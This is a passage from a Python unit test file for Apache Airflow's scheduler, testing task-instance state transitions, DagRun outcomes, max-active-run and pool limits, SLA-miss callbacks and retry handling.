self.assertEqual(State.QUEUED, ti.state)
@unittest.skipUnless("INTEGRATION" in os.environ,
"The test is flaky with nondeterministic result")
def test_change_state_for_tis_without_dagrun(self):
dag1 = DAG(dag_id='test_change_state_for_tis_without_dagrun', start_date=DEFAULT_DATE)
DummyOperator(task_id='dummy', dag=dag1, owner='airflow')
DummyOperator(task_id='dummy_b', dag=dag1, owner='airflow')
dag2 = DAG(dag_id='test_change_state_for_tis_without_dagrun_dont_change', start_date=DEFAULT_DATE)
DummyOperator(task_id='dummy', dag=dag2, owner='airflow')
dag3 = DAG(dag_id='test_change_state_for_tis_without_dagrun_no_dagrun', start_date=DEFAULT_DATE)
DummyOperator(task_id='dummy', dag=dag3, owner='airflow')
session = settings.Session()
dr1 = dag1.create_dagrun(run_id=DagRun.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
dr2 = dag2.create_dagrun(run_id=DagRun.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti1a = dr1.get_task_instance(task_id='dummy', session=session)
ti1a.state = State.SCHEDULED
ti1b = dr1.get_task_instance(task_id='dummy_b', session=session)
ti1b.state = State.SUCCESS
session.commit()
ti2 = dr2.get_task_instance(task_id='dummy', session=session)
ti2.state = State.SCHEDULED
session.commit()
ti3 = TI(dag3.get_task('dummy'), DEFAULT_DATE)
ti3.state = State.SCHEDULED
session.merge(ti3)
session.commit()
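# ti3 belongs to dag3, which has no DagRun at all, so it is the only instance
# expected to be reset to NONE below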
dagbag = self._make_simple_dag_bag([dag1, dag2, dag3])
scheduler = SchedulerJob(num_runs=0)
scheduler._change_state_for_tis_without_dagrun(
simple_dag_bag=dagbag,
old_states=[State.SCHEDULED, State.QUEUED],
new_state=State.NONE,
session=session)
ti1a = dr1.get_task_instance(task_id='dummy', session=session)
ti1a.refresh_from_db(session=session)
self.assertEqual(ti1a.state, State.SCHEDULED)
ti1b = dr1.get_task_instance(task_id='dummy_b', session=session)
ti1b.refresh_from_db(session=session)
self.assertEqual(ti1b.state, State.SUCCESS)
ti2 = dr2.get_task_instance(task_id='dummy', session=session)
ti2.refresh_from_db(session=session)
self.assertEqual(ti2.state, State.SCHEDULED)
ti3.refresh_from_db(session=session)
self.assertEqual(ti3.state, State.NONE)
dr1.refresh_from_db(session=session)
dr1.state = State.FAILED
# why o why
session.merge(dr1)
session.commit()
scheduler._change_state_for_tis_without_dagrun(
simple_dag_bag=dagbag,
old_states=[State.SCHEDULED, State.QUEUED],
new_state=State.NONE,
session=session)
ti1a.refresh_from_db(session=session)
self.assertEqual(ti1a.state, State.SCHEDULED)
# don't touch ti1b
ti1b.refresh_from_db(session=session)
self.assertEqual(ti1b.state, State.SUCCESS)
# don't touch ti2
ti2.refresh_from_db(session=session)
self.assertEqual(ti2.state, State.SCHEDULED)
def test_change_state_for_tasks_failed_to_execute(self):
dag = DAG(
dag_id='dag_id',
start_date=DEFAULT_DATE)
task = DummyOperator(
task_id='task_id',
dag=dag,
owner='airflow')
# If there's no left over task in executor.queued_tasks, nothing happens
session = settings.Session()
scheduler_job = SchedulerJob()
mock_logger = mock.MagicMock()
test_executor = TestExecutor()
scheduler_job.executor = test_executor
scheduler_job._logger = mock_logger
scheduler_job._change_state_for_tasks_failed_to_execute()
mock_logger.info.assert_not_called()
# Tasks failed to execute with QUEUED state will be set to SCHEDULED state.
session.query(TI).delete()
session.commit()
key = 'dag_id', 'task_id', DEFAULT_DATE, 1
test_executor.queued_tasks[key] = 'value'
ti = TI(task, DEFAULT_DATE)
ti.state = State.QUEUED
session.merge(ti)
session.commit()
scheduler_job._change_state_for_tasks_failed_to_execute()
ti.refresh_from_db()
self.assertEqual(State.SCHEDULED, ti.state)
# Tasks failed to execute with RUNNING state will not be set to SCHEDULED state.
session.query(TI).delete()
session.commit()
ti.state = State.RUNNING
session.merge(ti)
session.commit()
scheduler_job._change_state_for_tasks_failed_to_execute()
ti.refresh_from_db()
self.assertEqual(State.RUNNING, ti.state)
def test_execute_helper_reset_orphaned_tasks(self):
session = settings.Session()
dag = DAG(
'test_execute_helper_reset_orphaned_tasks',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='op1')
dag.clear()
dr = dag.create_dagrun(run_id=DagRun.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
dr2 = dag.create_dagrun(run_id=BackfillJob.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE + datetime.timedelta(1),
start_date=DEFAULT_DATE,
session=session)
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
ti.state = State.SCHEDULED
ti2 = dr2.get_task_instance(task_id=op1.task_id, session=session)
ti2.state = State.SCHEDULED
session.commit()
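# dr2 is a backfill run (its run_id uses the backfill prefix), so its orphaned
# TI should be left untouched by the reset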
processor = mock.MagicMock()
scheduler = SchedulerJob(num_runs=0)
executor = TestExecutor()
scheduler.executor = executor
scheduler.processor_agent = processor
scheduler._execute_helper()
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
self.assertEqual(ti.state, State.NONE)
ti2 = dr2.get_task_instance(task_id=op1.task_id, session=session)
self.assertEqual(ti2.state, State.SCHEDULED)
@parameterized.expand([
[State.UP_FOR_RETRY, State.FAILED],
[State.QUEUED, State.NONE],
[State.SCHEDULED, State.NONE],
[State.UP_FOR_RESCHEDULE, State.NONE],
])
def test_execute_helper_should_change_state_for_tis_without_dagrun(
self, initial_task_state, expected_task_state):
session = settings.Session()
dag = DAG(
'test_execute_helper_should_change_state_for_tis_without_dagrun',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='op1')
# Create DAG run with FAILED state
dag.clear()
dr = dag.create_dagrun(run_id=DagRun.ID_PREFIX,
state=State.FAILED,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
ti.state = initial_task_state
session.commit()
# Create scheduler and mock calls to processor. Run duration is set
# to a high value to ensure loop is entered. Poll interval is 0 to
# avoid sleep. Done flag is set to true to exit the loop immediately.
scheduler = SchedulerJob(num_runs=0, processor_poll_interval=0)
executor = TestExecutor()
executor.queued_tasks
scheduler.executor = executor
processor = mock.MagicMock()
processor.harvest_simple_dags.return_value = [dag]
processor.done = True
scheduler.processor_agent = processor
scheduler._execute_helper()
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
self.assertEqual(ti.state, expected_task_state)
@provide_session
def evaluate_dagrun(
self,
dag_id,
expected_task_states, # dict of task_id: state
dagrun_state,
run_kwargs=None,
advance_execution_date=False,
session=None):
"""
Helper for testing DagRun states with simple two-task DAGs.
This is hackish: a dag run is created but its tasks are
run by a backfill.
"""
if run_kwargs is None:
run_kwargs = {}
scheduler = SchedulerJob()
dag = self.dagbag.get_dag(dag_id)
dag.clear()
dr = scheduler.create_dag_run(dag)
if advance_execution_date:
# run a second time to schedule a dagrun after the start_date
dr = scheduler.create_dag_run(dag)
ex_date = dr.execution_date
try:
dag.run(start_date=ex_date, end_date=ex_date, **run_kwargs)
except AirflowException:
pass
# test tasks
for task_id, expected_state in expected_task_states.items():
task = dag.get_task(task_id)
ti = TI(task, ex_date)
ti.refresh_from_db()
self.assertEqual(ti.state, expected_state)
# load dagrun
dr = DagRun.find(dag_id=dag_id, execution_date=ex_date)
dr = dr[0]
dr.dag = dag
self.assertEqual(dr.state, dagrun_state)
def test_dagrun_fail(self):
"""
DagRuns with one failed and one incomplete root task -> FAILED
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_fail',
expected_task_states={
'test_dagrun_fail': State.FAILED,
'test_dagrun_succeed': State.UPSTREAM_FAILED,
},
dagrun_state=State.FAILED)
def test_dagrun_success(self):
"""
DagRuns with one failed and one successful root task -> SUCCESS
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_success',
expected_task_states={
'test_dagrun_fail': State.FAILED,
'test_dagrun_succeed': State.SUCCESS,
},
dagrun_state=State.SUCCESS)
def test_dagrun_root_fail(self):
"""
DagRuns with one successful and one failed root task -> FAILED
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_root_fail',
expected_task_states={
'test_dagrun_succeed': State.SUCCESS,
'test_dagrun_fail': State.FAILED,
},
dagrun_state=State.FAILED)
def test_dagrun_root_fail_unfinished(self):
"""
DagRuns with one unfinished and one failed root task -> RUNNING
"""
# Run both the failed and successful tasks
scheduler = SchedulerJob()
dag_id = 'test_dagrun_states_root_fail_unfinished'
dag = self.dagbag.get_dag(dag_id)
dag.clear()
dr = scheduler.create_dag_run(dag)
try:
dag.run(start_date=dr.execution_date, end_date=dr.execution_date)
except AirflowException: # Expect an exception since there is a failed task
pass
# Mark the successful task as never having run since we want to see if the
# dagrun will be in a running state despite having an unfinished task.
with create_session() as session:
ti = dr.get_task_instance('test_dagrun_unfinished', session=session)
ti.state = State.NONE
session.commit()
dr_state = dr.update_state()
self.assertEqual(dr_state, State.RUNNING)
def test_dagrun_deadlock_ignore_depends_on_past_advance_ex_date(self):
"""
DagRun is marked a success if ignore_first_depends_on_past=True
Test that an otherwise-deadlocked dagrun is marked as a success
if ignore_first_depends_on_past=True and the dagrun execution_date
is after the start_date.
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_deadlock',
expected_task_states={
'test_depends_on_past': State.SUCCESS,
'test_depends_on_past_2': State.SUCCESS,
},
dagrun_state=State.SUCCESS,
advance_execution_date=True,
run_kwargs=dict(ignore_first_depends_on_past=True))
def test_dagrun_deadlock_ignore_depends_on_past(self):
"""
Test that ignore_first_depends_on_past doesn't affect results
(this is the same test as
test_dagrun_deadlock_ignore_depends_on_past_advance_ex_date except
that start_date == execution_date so depends_on_past is irrelevant).
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_deadlock',
expected_task_states={
'test_depends_on_past': State.SUCCESS,
'test_depends_on_past_2': State.SUCCESS,
},
dagrun_state=State.SUCCESS,
run_kwargs=dict(ignore_first_depends_on_past=True))
def test_scheduler_start_date(self):
"""
Test that the scheduler respects start_dates, even when DAGS have run
"""
with create_session() as session:
dag_id = 'test_start_date_scheduling'
dag = self.dagbag.get_dag(dag_id)
dag.clear()
self.assertTrue(dag.start_date > datetime.datetime.utcnow())
scheduler = SchedulerJob(dag_id,
num_runs=2)
scheduler.run()
# zero tasks ran
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 0)
session.commit()
# previously, running this backfill would kick off the Scheduler
# because it would take the most recent run and start from there
# That behavior still exists, but now it will only do so if after the
# start date
backfill = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE)
backfill.run()
# one task ran
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 1)
session.commit()
scheduler = SchedulerJob(dag_id,
num_runs=2)
scheduler.run()
# still one task
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 1)
session.commit()
def test_scheduler_task_start_date(self):
"""
Test that the scheduler respects task start dates that are different
from DAG start dates
"""
dag_id = 'test_task_start_date_scheduling'
dag = self.dagbag.get_dag(dag_id)
dag.clear()
scheduler = SchedulerJob(dag_id,
num_runs=2)
scheduler.run()
session = settings.Session()
tiq = session.query(TI).filter(TI.dag_id == dag_id)
ti1s = tiq.filter(TI.task_id == 'dummy1').all()
ti2s = tiq.filter(TI.task_id == 'dummy2').all()
self.assertEqual(len(ti1s), 0)
self.assertEqual(len(ti2s), 2)
for t in ti2s:
self.assertEqual(t.state, State.SUCCESS)
def test_scheduler_multiprocessing(self):
"""
Test that the scheduler can successfully queue multiple dags in parallel
"""
dag_ids = ['test_start_date_scheduling', 'test_dagrun_states_success']
for dag_id in dag_ids:
dag = self.dagbag.get_dag(dag_id)
dag.clear()
scheduler = SchedulerJob(dag_ids=dag_ids,
num_runs=2)
scheduler.run()
# zero tasks ran
dag_id = 'test_start_date_scheduling'
session = settings.Session()
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 0)
def test_scheduler_dagrun_once(self):
"""
Test if the scheduler does not create multiple dagruns
if a dag is scheduled with @once and a start_date
"""
dag = DAG(
'test_scheduler_dagrun_once',
start_date=timezone.datetime(2015, 1, 1),
schedule_interval="@once")
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
dr = scheduler.create_dag_run(dag)
self.assertIsNone(dr)
@parameterized.expand([
[State.NONE, None, None],
[State.UP_FOR_RETRY, timezone.utcnow() - datetime.timedelta(minutes=30),
timezone.utcnow() - datetime.timedelta(minutes=15)],
[State.UP_FOR_RESCHEDULE, timezone.utcnow() - datetime.timedelta(minutes=30),
timezone.utcnow() - datetime.timedelta(minutes=15)],
])
def test_scheduler_process_task_instances(self, state, start_date, end_date):
"""
Test if _process_task_instances puts the right task instances into the
queue.
"""
dag = DAG(
dag_id='test_scheduler_process_execute_task',
start_date=DEFAULT_DATE)
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
with create_session() as session:
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
with create_session() as session:
tis = dr.get_task_instances(session=session)
for ti in tis:
ti.state = state
ti.start_date = start_date
ti.end_date = end_date
queue = Mock()
scheduler._process_task_instances(dag, queue=queue)
queue.append.assert_called_with(
(dag.dag_id, dag_task1.task_id, DEFAULT_DATE, TRY_NUMBER)
)
def test_scheduler_do_not_schedule_removed_task(self):
dag = DAG(
dag_id='test_scheduler_do_not_schedule_removed_task',
start_date=DEFAULT_DATE)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
dag = DAG(
dag_id='test_scheduler_do_not_schedule_removed_task',
start_date=DEFAULT_DATE)
queue = Mock()
scheduler._process_task_instances(dag, queue=queue)
queue.put.assert_not_called()
def test_scheduler_do_not_schedule_too_early(self):
dag = DAG(
dag_id='test_scheduler_do_not_schedule_too_early',
start_date=timezone.datetime(2200, 1, 1))
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNone(dr)
queue = Mock()
scheduler._process_task_instances(dag, queue=queue)
queue.put.assert_not_called()
def test_scheduler_do_not_run_finished(self):
dag = DAG(
dag_id='test_scheduler_do_not_run_finished',
start_date=DEFAULT_DATE)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
tis = dr.get_task_instances(session=session)
for ti in tis:
ti.state = State.SUCCESS
session.commit()
session.close()
queue = Mock()
scheduler._process_task_instances(dag, queue=queue)
queue.put.assert_not_called()
def test_scheduler_add_new_task(self):
"""
Test if a task instance will be added if the dag is updated
"""
dag = DAG(
dag_id='test_scheduler_add_new_task',
start_date=DEFAULT_DATE)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
tis = dr.get_task_instances()
self.assertEqual(len(tis), 1)
DummyOperator(
task_id='dummy2',
dag=dag,
owner='airflow')
queue = Mock()
scheduler._process_task_instances(dag, queue=queue)
tis = dr.get_task_instances()
self.assertEqual(len(tis), 2)
def test_scheduler_verify_max_active_runs(self):
"""
Test that a dagrun will not be scheduled if max_dag_runs has been reached
"""
dag = DAG(
dag_id='test_scheduler_verify_max_active_runs',
start_date=DEFAULT_DATE)
dag.max_active_runs = 1
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
dr = scheduler.create_dag_run(dag)
self.assertIsNone(dr)
def test_scheduler_fail_dagrun_timeout(self):
"""
Test if a dagrun will be set to failed if it times out
"""
dag = DAG(
dag_id='test_scheduler_fail_dagrun_timeout',
start_date=DEFAULT_DATE)
dag.dagrun_timeout = datetime.timedelta(seconds=60)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
dr.start_date = timezone.utcnow() - datetime.timedelta(days=1)
session.merge(dr)
session.commit()
dr2 = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr2)
dr.refresh_from_db(session=session)
self.assertEqual(dr.state, State.FAILED)
def test_scheduler_verify_max_active_runs_and_dagrun_timeout(self):
"""
Test if a dagrun will not be scheduled if max_dag_runs
has been reached and dagrun_timeout is not reached
Test if a dagrun will be scheduled if max_dag_runs has
been reached but dagrun_timeout is also reached
"""
dag = DAG(
dag_id='test_scheduler_verify_max_active_runs_and_dagrun_timeout',
start_date=DEFAULT_DATE)
dag.max_active_runs = 1
dag.dagrun_timeout = datetime.timedelta(seconds=60)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
# Should not be scheduled as DagRun has not timedout and max_active_runs is reached
new_dr = scheduler.create_dag_run(dag)
self.assertIsNone(new_dr)
# Should be scheduled as dagrun_timeout has passed
dr.start_date = timezone.utcnow() - datetime.timedelta(days=1)
session.merge(dr)
session.commit()
new_dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(new_dr)
def test_scheduler_max_active_runs_respected_after_clear(self):
"""
Test if _process_task_instances only schedules ti's up to max_active_runs
(related to issue AIRFLOW-137)
"""
dag = DAG(
dag_id='test_scheduler_max_active_runs_respected_after_clear',
start_date=DEFAULT_DATE)
dag.max_active_runs = 3
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
# First create up to 3 dagruns in RUNNING state.
scheduler.create_dag_run(dag)
# Reduce max_active_runs to 1
dag.max_active_runs = 1
queue = Mock()
# and schedule them in, so we can check how many
# tasks are put on the queue (should be one, not 3)
scheduler._process_task_instances(dag, queue=queue)
queue.append.assert_called_with(
(dag.dag_id, dag_task1.task_id, DEFAULT_DATE, TRY_NUMBER)
)
@patch.object(TI, 'pool_full')
def test_scheduler_verify_pool_full(self, mock_pool_full):
"""
Test task instances not queued when pool is full
"""
mock_pool_full.return_value = False
dag = DAG(
dag_id='test_scheduler_verify_pool_full',
start_date=DEFAULT_DATE)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow',
pool='test_scheduler_verify_pool_full')
session = settings.Session()
pool = Pool(pool='test_scheduler_verify_pool_full', slots=1)
session.add(pool)
orm_dag = DagModel(dag_id=dag.dag_id)
orm_dag.is_paused = False
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dag.clear()
# Create 2 dagruns, which will create 2 task instances.
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
self.assertEqual(dr.execution_date, DEFAULT_DATE)
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
queue = []
scheduler._process_task_instances(dag, queue=queue)
self.assertEqual(len(queue), 2)
dagbag = self._make_simple_dag_bag([dag])
# Recreated part of the scheduler here, to kick off tasks -> executor
for ti_key in queue:
task = dag.get_task(ti_key[1])
ti = TI(task, ti_key[2])
# Task starts out in the scheduled state. All tasks in the
# scheduled state will be sent to the executor
ti.state = State.SCHEDULED
# Also save this task instance to the DB.
session.merge(ti)
session.commit()
scheduler._execute_task_instances(dagbag,
(State.SCHEDULED,
State.UP_FOR_RETRY))
self.assertEqual(len(scheduler.executor.queued_tasks), 1)
def test_scheduler_auto_align(self):
"""
Test if the schedule_interval will be auto aligned with the start_date
such that if the start_date coincides with the schedule the first
execution_date will be start_date, otherwise it will be start_date +
interval.
"""
dag = DAG(
dag_id='test_scheduler_auto_align_1',
start_date=timezone.datetime(2016, 1, 1, 10, 10, 0),
schedule_interval="4 5 * * *"
)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
self.assertEqual(dr.execution_date, timezone.datetime(2016, 1, 2, 5, 4))
dag = DAG(
dag_id='test_scheduler_auto_align_2',
start_date=timezone.datetime(2016, 1, 1, 10, 10, 0),
schedule_interval="10 10 * * *"
)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
self.assertEqual(dr.execution_date, timezone.datetime(2016, 1, 1, 10, 10))
def test_scheduler_reschedule(self):
"""
Checks if tasks that are not taken up by the executor
get rescheduled
"""
executor = TestExecutor()
dagbag = DagBag(executor=executor)
dagbag.dags.clear()
dagbag.executor = executor
dag = DAG(
dag_id='test_scheduler_reschedule',
start_date=DEFAULT_DATE)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
dag.clear()
dag.is_subdag = False
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
orm_dag.is_paused = False
session.merge(orm_dag)
session.commit()
dagbag.bag_dag(dag=dag, root_dag=dag, parent_dag=dag)
@mock.patch('airflow.models.DagBag', return_value=dagbag)
@mock.patch('airflow.models.DagBag.collect_dags')
def do_schedule(function, function2):
# Use an empty file since the above mock will return the
# expected DAGs. Also specify only a single file so that it doesn't
# try to schedule the above DAG repeatedly.
scheduler = SchedulerJob(num_runs=1,
executor=executor,
subdir=os.path.join(settings.DAGS_FOLDER,
"no_dags.py"))
scheduler.heartrate = 0
scheduler.run()
do_schedule()
self.assertEqual(1, len(executor.queued_tasks))
executor.queued_tasks.clear()
do_schedule()
self.assertEqual(2, len(executor.queued_tasks))
def test_scheduler_sla_miss_callback(self):
"""
Test that the scheduler does not call the sla_miss_callback when a notification has already been sent
"""
session = settings.Session()
# Mock the callback function so we can verify that it was not called
sla_callback = MagicMock()
# Create dag with a start of 2 days ago, but an sla of 1 day
# ago so we'll already have an sla_miss on the books
test_start_date = days_ago(2)
dag = DAG(dag_id='test_sla_miss',
sla_miss_callback=sla_callback,
default_args={'start_date': test_start_date,
'sla': datetime.timedelta(days=1)})
task = DummyOperator(task_id='dummy',
dag=dag,
owner='airflow')
# Create a TaskInstance for two days ago
session.merge(models.TaskInstance(task=task,
execution_date=test_start_date,
state='success'))
# Create an SlaMiss where notification was sent, but email was not
session.merge(SlaMiss(task_id='dummy',
dag_id='test_sla_miss',
execution_date=test_start_date,
email_sent=False,
notification_sent=True))
# Now call manage_slas and see if the sla_miss callback gets called
scheduler = SchedulerJob(dag_id='test_sla_miss',
num_runs=1)
scheduler.manage_slas(dag=dag, session=session)
sla_callback.assert_not_called()
def test_scheduler_sla_miss_callback_exception(self):
"""
Test that the scheduler gracefully logs an exception if there is a problem
calling the sla_miss_callback
"""
session = settings.Session()
sla_callback = MagicMock(side_effect=RuntimeError('Could not call function'))
test_start_date = days_ago(2)
dag = DAG(dag_id='test_sla_miss',
sla_miss_callback=sla_callback,
default_args={'start_date': test_start_date})
task = DummyOperator(task_id='dummy',
dag=dag,
owner='airflow',
sla=datetime.timedelta(hours=1))
session.merge(models.TaskInstance(task=task,
execution_date=test_start_date,
state='Success'))
# Create an SlaMiss where notification was sent, but email was not
session.merge(SlaMiss(task_id='dummy',
dag_id='test_sla_miss',
execution_date=test_start_date))
# Now call manage_slas and see if the sla_miss callback gets called
scheduler = SchedulerJob(dag_id='test_sla_miss')
with mock.patch('airflow.jobs.SchedulerJob.log',
new_callable=PropertyMock) as mock_log:
scheduler.manage_slas(dag=dag, session=session)
sla_callback.assert_called()
mock_log().exception.assert_called_with(
'Could not call sla_miss_callback for DAG %s',
'test_sla_miss')
@mock.patch("airflow.utils.email.send_email")
def test_scheduler_sla_miss_email_exception(self, mock_send_email):
"""
Test that the scheduler gracefully logs an exception if there is a problem
sending an email
"""
session = settings.Session()
# Mock the callback function so we can verify that it was not called
mock_send_email.side_effect = RuntimeError('Could not send an email')
test_start_date = days_ago(2)
dag = DAG(dag_id='test_sla_miss',
default_args={'start_date': test_start_date,
'sla': datetime.timedelta(days=1)})
task = DummyOperator(task_id='dummy',
dag=dag,
owner='airflow',
email='[email protected]',
sla=datetime.timedelta(hours=1))
session.merge(models.TaskInstance(task=task,
execution_date=test_start_date,
state='Success'))
# Create an SlaMiss where notification was sent, but email was not
session.merge(SlaMiss(task_id='dummy',
dag_id='test_sla_miss',
execution_date=test_start_date))
scheduler = SchedulerJob(dag_id='test_sla_miss',
num_runs=1)
with mock.patch('airflow.jobs.SchedulerJob.log',
new_callable=PropertyMock) as mock_log:
scheduler.manage_slas(dag=dag, session=session)
mock_log().exception.assert_called_with(
'Could not send SLA Miss email notification for DAG %s',
'test_sla_miss')
def test_retry_still_in_executor(self):
"""
Checks if the scheduler does not put a task in limbo, when a task is retried
but is still present in the executor.
"""
executor = TestExecutor()
dagbag = DagBag(executor=executor)
dagbag.dags.clear()
dagbag.executor = executor
dag = DAG(
dag_id='test_retry_still_in_executor',
start_date=DEFAULT_DATE,
schedule_interval="@once")
dag_task1 = BashOperator(
task_id='test_retry_handling_op',
bash_command='exit 1',
retries=1,
dag=dag,
owner='airflow')
dag.clear()
dag.is_subdag = False
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
orm_dag.is_paused = False
session.merge(orm_dag)
session.commit()
dagbag.bag_dag(dag=dag, root_dag=dag, parent_dag=dag)
@mock.patch('airflow.models.DagBag', return_value=dagbag)
@mock.patch('airflow.models.DagBag.collect_dags')
def do_schedule(function, function2):
# Use an empty file since the above mock will return the
# expected DAGs. Also specify only a single file so that it doesn't
# try to schedule the above DAG repeatedly.
scheduler = SchedulerJob(num_runs=1,
executor=executor,
subdir=os.path.join(settings.DAGS_FOLDER,
"no_dags.py"))
scheduler.heartrate = 0
scheduler.run()
do_schedule()
self.assertEqual(1, len(executor.queued_tasks))
def run_with_error(task):
try:
task.run()
except AirflowException:
pass
ti_tuple = six.next(six.itervalues(executor.queued_tasks))
(command, priority, queue, simple_ti) = ti_tuple
ti = simple_ti.construct_task_instance()
ti.task = dag_task1
self.assertEqual(ti.try_number, 1)
# fail execution
run_with_error(ti)
self.assertEqual(ti.state, State.UP_FOR_RETRY)
self.assertEqual(ti.try_number, 2)
ti.refresh_from_db(lock_for_update=True, session=session)
ti.state = State.SCHEDULED
session.merge(ti)
session.commit()
# do not schedule
do_schedule()
self.assertTrue(executor.has_task(ti))
ti.refresh_from_db()
# removing self.assertEqual(ti.state, State.SCHEDULED)
# as scheduler will move state from SCHEDULED to QUEUED
# now that the executor has cleared, the task should be allowed to re-queue,
# but tasks that stay in executor.queued_tasks after executor.heartbeat()
# will be set back to the SCHEDULED state
executor.queued_tasks.clear()
do_schedule()
ti.refresh_from_db()
self.assertEqual(ti.state, State.SCHEDULED)
# To verify that task does get re-queued.
executor.queued_tasks.clear()
executor.do_update = True
do_schedule()
ti.refresh_from_db()
self.assertEqual(ti.state, State.RUNNING)
@unittest.skipUnless("INTEGRATION" in os.environ, "Can only run end to end")
def test_retry_handling_job(self):
"""
Integration test of the scheduler not accidentally resetting
the try_numbers for a task
"""
dag = self.dagbag.get_dag('test_retry_handling_job')
dag_task1 = dag.get_task("test_retry_handling_op")
dag.clear()
scheduler = SchedulerJob(dag_id=dag.dag_id,
num_runs=1)
scheduler.heartrate = 0
scheduler.run()
session = settings.Session()
ti = session.query(TI).filter(TI.dag_id == dag.dag_id,
TI.task_id == dag_task1.task_id).first()
# make sure the counter has increased
self.assertEqual(ti.try_number, 2)
self.assertEqual(ti.state, State.UP_FOR_RETRY)
def test_dag_with_system_exit(self):
"""
Test to check that a DAG with a system.exit() doesn't break the scheduler.
"""
dag_id = 'exit_test_dag'
dag_ids = [dag_id]
dag_directory = os.path.join(settings.DAGS_FOLDER,
"..",
"dags_with_system_exit")
dag_file = os.path.join(dag_directory,
'b_test_scheduler_dags.py')
dagbag = DagBag(dag_folder=dag_file)
for dag_id in dag_ids:
dag = dagbag.get_dag(dag_id)
dag.clear()
scheduler = SchedulerJob(dag_ids=dag_ids,
subdir=dag_directory,
num_runs=1)
scheduler.run()
with create_session() as session:
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 1)
def test_dag_get_active_runs(self):
"""
Test to check that a DAG returns its active runs
"""
now = timezone.utcnow()
